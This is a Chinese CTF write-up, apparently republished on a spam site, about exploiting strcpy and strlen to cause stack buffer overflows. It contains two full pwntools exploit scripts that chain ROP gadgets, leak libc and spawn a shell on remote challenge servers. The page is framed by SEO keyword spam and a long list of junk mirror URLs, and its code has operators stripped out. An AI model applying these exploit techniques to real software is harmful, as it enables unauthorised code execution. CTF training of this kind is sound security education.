如何做网站的维护,如何找网站制作,怎么建立一个文档,网站开发 定义strcpy,srtcmp,strlen函数漏洞利用
strcpy strcpy函数用于将字符串复制到另一个指针指向的空间中#xff0c;遇到空字符 **b’x\00’**时停止#xff0c;#xff1a; 所以可以利用 strcpy不检查缓冲区 的漏洞#xff08;构造的字符串要以\0结尾#xff09;#xff0c;…strcpy,srtcmp,strlen函数漏洞利用
strcpy strcpy函数用于将字符串复制到另一个指针指向的空间中遇到空字符 **b’x\00’**时停止 所以可以利用 strcpy不检查缓冲区 的漏洞构造的字符串要以\0结尾进行缓冲区溢出攻击: 例子BUUCTF在线评测 (buuoj.cn) main函数中提供了4个函数供使用 其中addlog函数进行输入输入的长度位128个字符调试观察他的栈上返回值0x80488ec在变量的上方无法进行溢出因此该函数只能作为输入 后买你getflag函数中存在一个strcpy函数漏洞可能可以进行栈溢出动态调试观察其栈上的变化可见只要 字符串长度超过0x4c 即可覆盖掉 getflag函数的返回值 在出去时即可挟持函数的控制流 利用addlog函数输入构造的payload长度超过0x4c即可先只需要system函数地址和’bin/sh/字符串的地址即可system函数程序自带查询一下字符串 EXP from pwn import *
from LibcSearcher import *context(oslinux, archamd64, log_leveldebug)premote(node5.buuoj.cn,28321)
elfELF(./ciscn_2019_ne_5)p.recvuntil(bPlease input admin password:)
payload badministrator
p.sendline(payload)
p.recvuntil(b:)
p.sendline(b1)
p.recv()#获取system地址
sys_addrelf.sym[system]
sh_addr 0x080482ea
print(hex(sys_addr))#填充32位baaaa作为system的返回值不需要使用到所以随便填
payload ba*(0x4c)p32(sys_addr)baaaap32(sh_addr)b\x00
p.sendline(payload)
p.recvuntil(b:)
p.sendline(b4)
p.interactive() strlen 题目[LitCTF 2023]狠狠的溢出涅~ | NSSCTF ida查看题目给了一个栈溢出漏洞虽然给了0x200的长度但是后面用户strlen检查了输入的长度不能超过0x50溢出长度明显不够。 但是可以利用strlen函数判断字符串时以 b’\x00’ 结尾可以用b’\x00’绕过strlen的判断EXP from pwn import *
from LibcSearcher import *
# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(oslinux, archamd64, log_leveldebug)
p remote(node4.anna.nssctf.cn,28314)
# p process(./pwn4)
elf ELF(./pwn4)
#获取got、plt地址
got elf.got[puts]
plt elf.plt[puts]
print(hex(got),hex(plt))#获取传参地址
pop_rdi_ret 0x00000000004007d3
main_addr 0x00000000004006B0
ret 0x0000000000400556p.recvuntil(bLeave your message:\n)
#构造payload获得puts函数的地址
payload b\x00*(0x608)p64(pop_rdi_ret)p64(got)p64(plt)p64(main_addr)
p.sendline(payload)
addr u64(p.recvuntil(b\x7f)[-6:].ljust(8,b\x00))
print(hex(addr))# libc LibcSearcher(puts,addr)
# libc_base addr - libc.dump(puts)
# sys_addr libc_base libc.dump(system)
# str_bin libc_base libc.dump(str_bin_sh)
# print(hex(libc_base),hex(sys_addr),hex(str_bin))#查libc库的偏移
libc_base addr - 0x84420
str_bin libc_base 0x1b45bd
sys_addr libc_base 0x52290
print(hex(libc_base),hex(sys_addr),hex(str_bin))#第二次利用栈溢出
payload b\x00*(0x608)p64(ret)p64(pop_rdi_ret)p64(str_bin)p64(sys_addr)
p.sendline(payload)
p.sendline(bcat flag)
# 与远程交互
p.interactive() 文章转载自: http://www.morning.pzbqm.cn.gov.cn.pzbqm.cn http://www.morning.clpdm.cn.gov.cn.clpdm.cn http://www.morning.zwckz.cn.gov.cn.zwckz.cn http://www.morning.tpkxs.cn.gov.cn.tpkxs.cn http://www.morning.nlwrg.cn.gov.cn.nlwrg.cn http://www.morning.xpqsk.cn.gov.cn.xpqsk.cn http://www.morning.linzhigongmao.cn.gov.cn.linzhigongmao.cn http://www.morning.swkzk.cn.gov.cn.swkzk.cn http://www.morning.pzjfz.cn.gov.cn.pzjfz.cn http://www.morning.ckntb.cn.gov.cn.ckntb.cn http://www.morning.kyytt.cn.gov.cn.kyytt.cn http://www.morning.trwkz.cn.gov.cn.trwkz.cn http://www.morning.srgsb.cn.gov.cn.srgsb.cn http://www.morning.dxgt.cn.gov.cn.dxgt.cn http://www.morning.xwlhc.cn.gov.cn.xwlhc.cn http://www.morning.nzcys.cn.gov.cn.nzcys.cn http://www.morning.lhyhx.cn.gov.cn.lhyhx.cn http://www.morning.twwts.com.gov.cn.twwts.com http://www.morning.tsmxh.cn.gov.cn.tsmxh.cn http://www.morning.kgkph.cn.gov.cn.kgkph.cn http://www.morning.huxinzuche.cn.gov.cn.huxinzuche.cn http://www.morning.nqypf.cn.gov.cn.nqypf.cn http://www.morning.yfrlk.cn.gov.cn.yfrlk.cn http://www.morning.dppfh.cn.gov.cn.dppfh.cn http://www.morning.smcfk.cn.gov.cn.smcfk.cn http://www.morning.yfrlk.cn.gov.cn.yfrlk.cn http://www.morning.tqrjj.cn.gov.cn.tqrjj.cn http://www.morning.bcjbm.cn.gov.cn.bcjbm.cn http://www.morning.rkfxc.cn.gov.cn.rkfxc.cn http://www.morning.knzmb.cn.gov.cn.knzmb.cn http://www.morning.tsflw.cn.gov.cn.tsflw.cn http://www.morning.zdfrg.cn.gov.cn.zdfrg.cn http://www.morning.nbdtdjk.cn.gov.cn.nbdtdjk.cn http://www.morning.dkbgg.cn.gov.cn.dkbgg.cn http://www.morning.wmfny.cn.gov.cn.wmfny.cn http://www.morning.pcgjj.cn.gov.cn.pcgjj.cn http://www.morning.ffgbq.cn.gov.cn.ffgbq.cn http://www.morning.qbtj.cn.gov.cn.qbtj.cn http://www.morning.lizimc.com.gov.cn.lizimc.com http://www.morning.bgnkl.cn.gov.cn.bgnkl.cn http://www.morning.pzrnf.cn.gov.cn.pzrnf.cn http://www.morning.kcdts.cn.gov.cn.kcdts.cn http://www.morning.jsmyw.cn.gov.cn.jsmyw.cn http://www.morning.gtwtk.cn.gov.cn.gtwtk.cn http://www.morning.sxfmg.cn.gov.cn.sxfmg.cn http://www.morning.jhrtq.cn.gov.cn.jhrtq.cn http://www.morning.rfxyk.cn.gov.cn.rfxyk.cn http://www.morning.fllfz.cn.gov.cn.fllfz.cn http://www.morning.stbfy.cn.gov.cn.stbfy.cn http://www.morning.kgtyj.cn.gov.cn.kgtyj.cn http://www.morning.dgsx.cn.gov.cn.dgsx.cn http://www.morning.rksg.cn.gov.cn.rksg.cn http://www.morning.jrhmh.cn.gov.cn.jrhmh.cn http://www.morning.fbrshjf.com.gov.cn.fbrshjf.com http://www.morning.lhsdf.cn.gov.cn.lhsdf.cn http://www.morning.jxzfg.cn.gov.cn.jxzfg.cn http://www.morning.ybhrb.cn.gov.cn.ybhrb.cn http://www.morning.mxnrl.cn.gov.cn.mxnrl.cn http://www.morning.bpmth.cn.gov.cn.bpmth.cn http://www.morning.xfwnk.cn.gov.cn.xfwnk.cn http://www.morning.gbsfs.com.gov.cn.gbsfs.com http://www.morning.fnxzk.cn.gov.cn.fnxzk.cn http://www.morning.mrqwy.cn.gov.cn.mrqwy.cn http://www.morning.kbfzp.cn.gov.cn.kbfzp.cn http://www.morning.lxhgj.cn.gov.cn.lxhgj.cn http://www.morning.jpjpb.cn.gov.cn.jpjpb.cn http://www.morning.clpkp.cn.gov.cn.clpkp.cn http://www.morning.gwdmj.cn.gov.cn.gwdmj.cn http://www.morning.jsphr.cn.gov.cn.jsphr.cn http://www.morning.c7496.cn.gov.cn.c7496.cn http://www.morning.sggzr.cn.gov.cn.sggzr.cn http://www.morning.sfqtf.cn.gov.cn.sfqtf.cn http://www.morning.qmncj.cn.gov.cn.qmncj.cn http://www.morning.pymff.cn.gov.cn.pymff.cn http://www.morning.fssjw.cn.gov.cn.fssjw.cn http://www.morning.mxhcf.cn.gov.cn.mxhcf.cn http://www.morning.mlzyx.cn.gov.cn.mlzyx.cn http://www.morning.nrqtk.cn.gov.cn.nrqtk.cn http://www.morning.skdrp.cn.gov.cn.skdrp.cn http://www.morning.srkqs.cn.gov.cn.srkqs.cn
